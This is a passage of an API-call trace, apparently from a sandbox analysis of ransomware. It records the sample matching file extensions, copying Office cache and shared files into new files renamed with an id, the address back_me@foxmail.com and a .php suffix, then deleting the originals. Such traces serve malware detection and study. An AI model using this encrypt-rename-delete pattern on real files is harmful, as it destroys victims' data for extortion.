Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.638] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.638] lstrlenW (lpString=".doc") returned 4 [0037.638] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.638] lstrlenW (lpString=".docx") returned 5 [0037.638] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0037.638] lstrlenW (lpString=".pdf") returned 4 [0037.638] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.638] lstrlenW (lpString=".xls") returned 4 [0037.638] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.638] lstrlenW (lpString=".xlsx") returned 5 [0037.638] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0037.638] lstrlenW (lpString=".ppt") returned 4 [0037.638] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.638] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.638] lstrlenW (lpString=".zip") returned 4 [0037.638] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.638] lstrlenW (lpString=".rar") returned 4 [0037.638] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.638] lstrlenW (lpString=".bz2") returned 4 [0037.638] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.638] lstrlenW (lpString=".7z") returned 3 [0037.638] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.638] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.638] lstrlenW (lpString=".dbf") returned 4 [0037.639] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.639] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.639] lstrlenW (lpString=".1cd") returned 4 [0037.639] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.639] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.639] lstrlenW (lpString=".jpg") returned 4 [0037.639] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.639] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0037.639] lstrlenW (lpString="Setup.xml") returned 9 [0037.639] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0037.639] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=16683) returned 1 [0037.639] CloseHandle (hObject=0x1c0) returned 1 [0037.639] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0037.639] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0037.639] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0037.640] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.640] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.640] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0037.640] GetLastError () returned 0x0 [0037.640] ReadFile (in: hFile=0x1c0, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x412b, lpOverlapped=0x0) returned 1 [0037.748] WriteFile (in: hFile=0x1e4, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0x4130, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0x4130, lpOverlapped=0x0) returned 1 [0037.749] ReadFile (in: hFile=0x1c0, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0037.749] WriteFile (in: hFile=0x1e4, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0037.749] SetEndOfFile (hFile=0x1e4) returned 1 [0037.749] CloseHandle (hObject=0x1e4) returned 1 [0037.750] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.750] SetEndOfFile (hFile=0x1c0) returned 1 [0037.751] CloseHandle (hObject=0x1c0) returned 1 [0037.751] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0037.751] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0037.751] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.751] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.751] lstrlenW (lpString=".doc") returned 4 [0037.751] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.751] lstrlenW (lpString=".docx") returned 5 [0037.751] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0037.751] lstrlenW (lpString=".pdf") returned 4 [0037.751] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.751] lstrlenW (lpString=".xls") returned 4 [0037.751] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.752] lstrlenW (lpString=".xlsx") returned 5 [0037.752] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0037.752] lstrlenW (lpString=".ppt") returned 4 [0037.752] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.752] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.752] lstrlenW (lpString=".zip") returned 4 [0037.752] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.752] lstrlenW (lpString=".rar") returned 4 [0037.752] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.752] lstrlenW (lpString=".bz2") returned 4 [0037.752] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.752] lstrlenW (lpString=".7z") returned 3 [0037.752] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.752] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.752] lstrlenW (lpString=".dbf") returned 4 [0037.752] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.752] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.752] lstrlenW (lpString=".1cd") returned 4 [0037.752] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.752] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.752] lstrlenW (lpString=".jpg") returned 4 [0037.752] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.752] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.752] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.752] lstrlenW (lpString=".doc") returned 4 [0037.752] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.752] lstrlenW (lpString=".docx") returned 5 [0037.752] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0037.752] lstrlenW (lpString=".pdf") returned 4 [0037.752] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.752] lstrlenW (lpString=".xls") returned 4 [0037.753] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.753] lstrlenW (lpString=".xlsx") returned 5 [0037.753] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0037.753] lstrlenW (lpString=".ppt") returned 4 [0037.753] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.753] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.753] lstrlenW (lpString=".zip") returned 4 [0037.753] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.753] lstrlenW (lpString=".rar") returned 4 [0037.753] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.753] lstrlenW (lpString=".bz2") returned 4 [0037.753] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.753] lstrlenW (lpString=".7z") returned 3 [0037.753] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.753] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.753] lstrlenW (lpString=".dbf") returned 4 [0037.753] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.753] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.753] lstrlenW (lpString=".1cd") returned 4 [0037.753] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.753] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.753] lstrlenW (lpString=".jpg") returned 4 [0037.753] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.753] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0037.753] lstrlenW (lpString="Setup.xml") returned 9 [0037.753] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0037.754] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=20577) returned 1 [0037.754] CloseHandle (hObject=0x1c0) returned 1 [0037.754] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0037.754] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0037.754] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0037.754] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.754] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.754] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0037.755] GetLastError () returned 0x0 [0037.755] ReadFile (in: hFile=0x1c0, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x5061, lpOverlapped=0x0) returned 1 [0037.890] WriteFile (in: hFile=0x1e4, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0x5070, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0x5070, lpOverlapped=0x0) returned 1 [0037.891] ReadFile (in: hFile=0x1c0, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0037.891] WriteFile (in: hFile=0x1e4, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0037.891] SetEndOfFile (hFile=0x1e4) returned 1 [0037.891] CloseHandle (hObject=0x1e4) returned 1 [0037.892] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.892] SetEndOfFile (hFile=0x1c0) returned 1 [0037.893] CloseHandle (hObject=0x1c0) returned 1 [0037.893] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0037.893] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0037.971] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.971] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.971] lstrlenW (lpString=".doc") returned 4 [0037.971] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.971] lstrlenW (lpString=".docx") returned 5 [0037.971] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0037.971] lstrlenW (lpString=".pdf") returned 4 [0037.971] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.971] lstrlenW (lpString=".xls") returned 4 [0037.971] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.971] lstrlenW (lpString=".xlsx") returned 5 [0037.971] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0037.971] lstrlenW (lpString=".ppt") returned 4 [0037.971] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.972] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.972] lstrlenW (lpString=".zip") returned 4 [0037.972] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.972] lstrlenW (lpString=".rar") returned 4 [0037.972] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.972] lstrlenW (lpString=".bz2") returned 4 [0037.972] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.972] lstrlenW (lpString=".7z") returned 3 [0037.972] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.972] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.972] lstrlenW (lpString=".dbf") returned 4 [0037.972] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.972] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.972] lstrlenW (lpString=".1cd") returned 4 [0037.972] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.972] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.972] lstrlenW (lpString=".jpg") returned 4 [0037.972] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.972] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.972] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.972] lstrlenW (lpString=".doc") returned 4 [0037.972] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.973] lstrlenW (lpString=".docx") returned 5 [0037.973] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0037.973] lstrlenW (lpString=".pdf") returned 4 [0037.973] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.973] lstrlenW (lpString=".xls") returned 4 [0037.973] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.973] lstrlenW (lpString=".xlsx") returned 5 [0037.973] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0037.973] lstrlenW (lpString=".ppt") returned 4 [0037.973] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.973] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.973] lstrlenW (lpString=".zip") returned 4 [0037.973] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.973] lstrlenW (lpString=".rar") returned 4 [0037.973] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.973] lstrlenW (lpString=".bz2") returned 4 [0037.973] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.973] lstrlenW (lpString=".7z") returned 3 [0037.973] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.973] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.973] lstrlenW (lpString=".dbf") returned 4 [0037.973] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.973] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.973] lstrlenW (lpString=".1cd") returned 4 [0037.973] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.973] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.973] lstrlenW (lpString=".jpg") returned 4 [0037.973] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.974] lstrcmpiW (lpString1=".GIF", lpString2=".php") returned -1 [0037.974] lstrlenW (lpString="MS.GIF") returned 6 [0037.974] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0037.981] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=1069) returned 1 [0037.981] CloseHandle (hObject=0x1e4) returned 1 [0037.981] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.gif")) returned 0x20 [0037.982] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0037.982] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0037.982] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.982] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.982] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0037.982] GetLastError () returned 0x0 [0037.982] ReadFile (in: hFile=0x1e4, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x42d, lpOverlapped=0x0) returned 1 [0037.986] WriteFile (in: hFile=0x1ec, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0x430, lpOverlapped=0x0) returned 1 [0037.987] ReadFile (in: hFile=0x1e4, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0037.987] WriteFile (in: hFile=0x1ec, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xe0, lpOverlapped=0x0) returned 1 [0037.987] SetEndOfFile (hFile=0x1ec) returned 1 [0037.987] CloseHandle (hObject=0x1ec) returned 1 [0037.988] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.988] SetEndOfFile (hFile=0x1e4) returned 1 [0037.989] CloseHandle (hObject=0x1e4) returned 1 [0037.989] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0037.989] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.gif")) returned 1 [0037.989] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0037.990] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0037.990] lstrlenW (lpString=".doc") returned 4 [0037.990] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0037.990] lstrlenW (lpString=".docx") returned 5 [0037.990] lstrcmpiW (lpString1=".docx", lpString2="S.GIF") returned -1 [0037.990] lstrlenW (lpString=".pdf") returned 4 [0037.990] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0037.990] lstrlenW (lpString=".xls") returned 4 [0037.990] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0037.990] lstrlenW (lpString=".xlsx") returned 5 [0037.990] lstrcmpiW (lpString1=".xlsx", lpString2="S.GIF") returned -1 [0037.990] lstrlenW (lpString=".ppt") returned 4 [0037.990] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0037.990] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0037.990] lstrlenW (lpString=".zip") returned 4 [0037.990] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0037.990] lstrlenW (lpString=".rar") returned 4 [0037.990] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0037.990] lstrlenW (lpString=".bz2") returned 4 [0037.990] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0037.990] lstrlenW (lpString=".7z") returned 3 [0037.990] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0037.990] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0037.990] lstrlenW (lpString=".dbf") returned 4 [0037.990] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0037.990] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0037.990] lstrlenW (lpString=".1cd") returned 4 [0037.990] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0037.990] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0037.990] lstrlenW (lpString=".jpg") returned 4 [0037.990] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0037.990] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0037.991] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0037.991] lstrlenW (lpString=".doc") returned 4 [0037.991] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0037.991] lstrlenW (lpString=".docx") returned 5 [0037.991] lstrcmpiW 